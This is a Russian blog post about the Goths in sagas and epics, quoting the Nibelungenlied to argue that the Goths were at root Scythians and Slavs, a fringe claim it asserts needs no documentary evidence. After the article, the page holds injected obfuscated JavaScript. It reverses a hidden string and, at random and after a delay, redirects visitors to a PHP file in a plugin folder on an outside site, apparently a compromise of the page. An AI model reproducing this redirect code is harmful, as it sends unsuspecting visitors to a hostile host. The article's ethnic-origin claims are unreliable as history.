Готы. Саги и былины

Когда скифы (готы) попали на территорию Римской империи, произошла смена их культуры, окатоличивание племен, смешение с многочисленными племенами, которые прежде жили в Европе, и приходили еще, с Востока. Но в целом основа у этих племен – скифская, славянская. Да это и без бумаг видно всякому, кто хоть немножко путешествовал и видел свет.

И все же основой исторической памяти всякого народа являются его эпические сказания. В сагах и былинах народ вспоминает свою раннюю историю, повествует о том, как он сложился и откуда пришел на свою современную родину. В средневековых германских сагах державу гуннов помнили очень хорошо. Помнили и о народах, которые входили в эту державу.

Легенды о готах. Один
Легенды о готах. Один

В «Песне о Нибелунгах» есть описание блестящего шествия, своего рода воинского парада при дворе Аттилы. В переводе Ю. Корнеева — это описание выглядит так:

То на дыбы вздымая своих коней лихих,

То с громким криком пришпоривая их,

Скакали русы, греки, валахи и поляки

Бесстрашием и ловкостью блеснуть старался всякий.

Вослед им шумною и дикою ордою

Бойцы из Киевской земли неслись густой толпою.

Написана «Песнь о Нибелунгах» веке в XI–XII, и это легко определить уже из приведенного отрывка. Но, по мнению такого знатока европейского Средневековья, как А. Я. Гуревич, при всех позднейших искажениях в «Песне о Нибелунгах» очень четко просматривается содержание событий V века — событий, составивших ядро германского эпоса [69. С. 707–710].

В гуннской державе хорошо знали восточных славян; не только воины, служившие гуннским владыкам, но и славянские плотники, и купцы были хорошо знакомы в Паннонии времен гуннов [70. С. 81]. Так что славяне и германские народы, в том числе готы, продолжали контактировать и в гуннскую эпоху.

Многие историки и культурологи рассматривают события времен «готского величия» — от Германариха до крушения Италии остготов в VI веке и Испании вестготов в VIII веке — как время, когда формировались духовные основы всей будущей германской нации. Приходится признать — славяне неотделимы от этих истоков. Крепкая историческая память немцев очень хорошо это усвоила в былинах и преданиях.


tor -->
$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}ton__link has-text-color has-very-dark-gray-color has-background» href=»https://zen.yandex.ru/otkritaya_seminariya» style=»background-color:#b9defd»>МОЙ КАНАЛ НА ЯНДЕКС ДЗЕН
5800cookie-checkГоты. Саги и былины

You Might Also Like

No Comments

    Leave a Reply

    Этот сайт использует Akismet для борьбы со спамом. Узнайте, как обрабатываются ваши данные комментариев.